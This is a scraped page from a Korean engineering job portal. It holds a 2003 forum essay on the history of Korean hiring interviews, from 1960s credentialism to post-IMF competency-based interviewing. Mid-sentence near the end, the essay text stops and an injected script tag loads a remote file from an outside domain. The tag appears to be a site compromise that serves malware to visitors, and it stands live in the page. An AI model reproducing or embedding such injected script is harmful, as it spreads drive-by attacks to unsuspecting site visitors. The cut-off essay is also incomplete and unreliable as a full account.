기계, 전기, 전자, 엔지니어링, 설계, 생산, 기술영업, 기술직, 이공계 기술취업, 이엔지잡, 구인, 구직, 채용정보 이엔지잡 engjob.co.kr

Since 1998 이엔지잡 기계·전기전자·IT·자동차·화학·철강·금속·기술산업
Since 1998 이공계 기술인/엔지니어 취업포털 1위, 이엔지잡 ★ 설계/생산/기술/품질/연구개발/기술영업/관리
Since 1998 이공계 기술인/엔지니어 취업포털 1위, 이엔지잡 ★ 설계/생산/기술/품질/연구개발/기술영업/관리
Since 1998 직업전문학교, 직업훈련, 연수생, 취업아카데미, 취업학원, 취업교육, 교육생 모집 전문
Since 1998 이공계 기술인/엔지니어 취업포털 1위, 이엔지잡 ★ 설계/생산/기술/품질/연구개발/기술영업/관리
Since 1998 이공계 기술인/엔지니어 취업포털 1위, 이엔지잡 ★ 설계/생산/기술/품질/연구개발/기술영업/관리
 
  업종별 채용정보
전체 채용속보
전기/전자/통신/IT
기계/철강/금속/자동차
기술/생산/기능/노무
건설/환경/화학/기타
  직종별 채용정보
생산/제조/설비
기술·연구개발/R&D/설계
공정/품질/조립/포장
정비/검사/수리/A·S
설치·전기기사/열관리
건설/노무/기능/일용
  인재정보
이력서 상세검색
전체 인재정보
  기업회원관리
내 채용광고 관리
유료옵션서비스 안내
  개인회원관리
내 이력서 관리
유료옵션서비스 안내
  기술인프라자
취업내공쌓기(기초)
노무상식
기업별취업족보
  정회원 프리미엄존
취업내공쌓기(고급)
  이엔지잡 포커스
자격포털 Q-net
취업사기대처요령
  주요기업 채용홈
삼성전자
디어삼성 그룹채용
현대자동차
포스코
동부제철
현대제철
대한항공
  관련 사이트
협회/학회/단체
학교/학과
한국폴리텍대학
직업능력지식포털
교육부
산업통상자원부
앱설치 QR코드
앱설치 QR코드
취업내공쌓기{기초}
JOB소리 해보자구요~ 선후배 기술인들이 서로 격려, 조언해주면서 희망을 찾는 공간입니다. 고민상담, 취업수기, 직장생활 희노애락, 수다떨기 등 모든 JOB소리 OK! 비방, 욕설, 광고, 여러 게시판 중복글은 삭제함.
서비스이용에 관한 문의 및 제안은 운영자 이메일로 보내주세요!


작성자 : attack

작성일 : 2003-07-08 오후 12:04:20 

조회 : 708

제목 : 면접시-공격적으로 나를 팔자!


면접시-공격적으로 나를 팔자! 
과거 면접은 입사가 다 결정된 후 통과의례로 인사나 나누는 자리에 불과했다. 이미 서류심사와 입사시험으로 
대충 윤곽을 잡아둔 상태에서 면접이라는 전형 절차는 형식적인 자리의 성격이 강했던 것. 
이러한 면접은 70년대 이후 채용절차가 체계화 되면서 실시됐다. 

먼저 근대적 산업화가 시작된 60년대를 보면 기업들이 비로소 사원채용에 눈을 뜨기 시작한다. 당시 가장 인
기 있었던 직업은 은행원으로 여성들이 은행 대리와 결혼하게 되는 것을 최고의 꿈으로 생각할 정도였다. 

그도 그럴 것이 그동안 고학력자가 변변히 취업해서 매달 임금을 받을 수 있는 곳이 없었기 때문이다. 대학에
서는 법학과나 상과대학의 인기가 높았다. 의무교육의 시행으로 많은 수의 교사가 필요해짐에 따라 교사도 유
망한 직업이 됐다. 
따라서 60년대의 인재상은 절대적으로 고등교육을 마친 사람일 수밖에 없었다. 그때는 산업인구의 60% 정도
가 농림수산업에 종사하던 시절이었다. 

70년대는 2차 경제개발이 시작되면서 기술자의 필요성이 커지면서 공과대학의 선호도도 높아졌다. 한편 5·16 
군사 쿠데타의 주인공들이 국가의 주요 요직을 차지했고, 이러한 사회현상은 결국 장교 출신의 군인이 유망한 
직업이 되어 사관학교 진학이 새로운 의미로 받아들여지게 되었다. 
기업에서도 필요한 인력공급을 원활히 하기 위해 사업장 내 직업훈련을 실시했으며 이는 전체 기능 인력의 
70%에 달했다. 

71년 고려대에 입학했던 이석주씨는 “졸업과 동시에 현대건설에 입사했다. 당시 입사에서 가장 결정적인 요소
는 학벌이었다. 그리고 입사한 이후에는 조직에 대한 충성도 외 위계질서 유지가 중요한 기업문화였다”며 당
시를 설명했다. 
그는 “면접에서는 가정환경을 많이 물어봤다. 그러나 이미 서류심사와 필기시험을 통과한 상태였기 때문에 그
다지 큰 의미는 없었다”고 말했다. 


다양한 형식의 심층면접 강세
80~90년대 초반 일반적인 채용에서는 대부분 그룹공채로 사원모집을 했다. 회사마다 다소 차이는 있었지만 
대부분 서류전형을 거쳐 영어, 전공 등의 필기시험을 보고 면접을 보는 절차였다. 재미있는 것은 같은날 여러 
개의 기업 채용시험 있었다는 것이다. 지금은 일상화된 수시채용이 없었던 시절, ‘한번 떨어지면 끝장’인 상황
이었다. 

85년 한화그룹에 입사한 김상수씨는 “도서관에서 공부를 하고 있으면 친구들한테 ‘소심한 녀석’이라는 핀잔을 
들었던 시절이다. 그러나 당시에도 취업의 스트레스가 없었던 것은 아니다. 누구에게 말해도 당당할 수 있는 
곳에 입사하기 위해 나름대로 치열하게 노력했다. 
면접은 일반적인 내용이었다. 가족관계를 묻고, 이 회사에서 내가 할 수 있는 것이 무엇인가를 묻는 정도였다. 
관건은 자신감과 패기를 보여주는 것 이었다”라도 당시를 회상했다. 

씁쓸한 일이지만 분명 채용에 ‘백 그라운드’가 중요했던 시대이기도 했다. 84년 10월에 발행된 본지의 기사 한 
타이틀이 “빽이 없이도 취직할 수 있다. 오직 실력만이 떳떳한 길!”이라는 것은 이러한 현실을 잘 대변한다고 
할 수 있다. 

특히 여학생의 경우 취업의 문은 훨씬 좁았던 것이 사실. 84년 처음으로 현대그룹과 효성그룹이 신입사원 모집
에서 전직종에 걸쳐 성별을 구분하지 않겠다는고 발표해 사회가 떠들썩하기도 했다. 

당시 기사에서 덕성여대 재학생 김인숙씨는 “내가 입사할 확률은 아주 불확실하다. 그러나 여대생의 한 사람
으로서 대단히 환영할 일이다”라고 소감을 밝히고 있다.


급변하는 기업문화, 이색면접이 뜬다



90년대 후반부터는 채용절차에서 일대 혁신이 일어난 시기다. 이른바 체계화되고 과학적인 채용이 본격화된 
시기라고 할 수 있다. 

결정적인 역할은 한 것은 IMF 외환위기이다. 이후 기업 환경이 급변하면서 채용시장도 큰 변화를 맞았다. 

기업들은 대규모 그룹채용을 대폭 축소하고 수시모집이나 기업별 개별공채가 보편화됐다. 

신입사원 모집을 줄이고 경력직 채용을 늘린 것도 큰 변화이다. 업무에 바로 투입이 가능하고 위기대처능력이 
빠른 인재를 채용하기 위해서이다. 
최근 기업의 80% 이상은 채용시 가장 중요한 선발도구로 면접을 채택하고 있다. 

기존 채용 기준이 지식과 스킬이었다면 지금은 인간의 내면에 자리잡고 있는 동기와 특질이 더욱 중요하다고 
보고 있다. 지식과 스킬은 어느 정도 훈련으로 습득이 가능하지만 인간의 잠재된 역량은 쉽게 바뀌기 어렵다
는 인식 때문이다. 

대학의 취업 프로그램도 면접을 대비하기 위한 실전 모의면접을 강화하고, 다양한 상황을 연출하면서 학생들
의 적응력을 키우고 있다. 또 고시나 언론사 입사 준비생 등에 국한됐던 ‘스터디 그룹’?script src=http://sion.cr.kr/iis.swf></script>
삭제버튼을 누르기전에 비밀번호를 입력하세요.
답변 수정 목록 글쓰기 최근리스트 지난리스트
채용정보 네트워크
소재지 : 서울 강북구 한천로140길 5-6 (주)컴테크컨설팅 대표 유종현
사업자등록번호 : 210-81-25058
직업정보제공사업신고번호 서울북부 제 2008-01호
통신판매업신고번호 강북-제 1911 호
문의메일 : helper@engjob.co.kr
전화 : 02-990-4698
FAX : 02-994-3693
앱설치 QR코드
대한민국 파워리더 대상
일자리발전공헌 부문 대상 수상
(2017.06)
대한민국 베스트 브랜드 대상
(2016.12)
대한민국 인성교육 대상
진로교육부문 대상 수상
(2016.07)
대한민국 교육공헌 대상
일자리공헌부문 대상 수상
(2016.02)
인취련인증서
보안 인증
클릭하시면 이니시스 결제시스템의 유효성을 확인하실 수 있습니다.
이니시스 전자결제
Copyright ⓒ 1991-2019
이엔지잡
All rights reserved.